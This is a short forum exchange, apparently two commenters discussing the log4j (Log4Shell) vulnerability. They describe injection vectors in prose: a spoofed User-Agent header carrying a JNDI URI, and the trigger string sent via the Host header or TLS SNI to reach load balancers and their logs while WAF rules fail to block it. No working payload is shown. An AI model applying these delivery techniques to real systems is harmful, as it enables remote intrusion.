[jbourne]

Yes this is still possible if you log any user-modifiable value. One example would be logging out a user agent header - if an attacker spoofs this to include a JDNI URI then the vulnerability can be exploited.

This is why this CVE is so scary - I would imagine the majority of applications using log4j will log out a user-supplied value at some point.

[bostik]

How about feeding the magic string via Host header in your requests and then cutting off? You wouldn't even need to establish the full TLS handshake, SNI is sent in the clear, and you would get to hit every single load-balancer and middle box - and everything they send their logs to.

Oh, and WAF rules won't protect you either: https://twitter.com/Rezn0k/status/1469523006015750146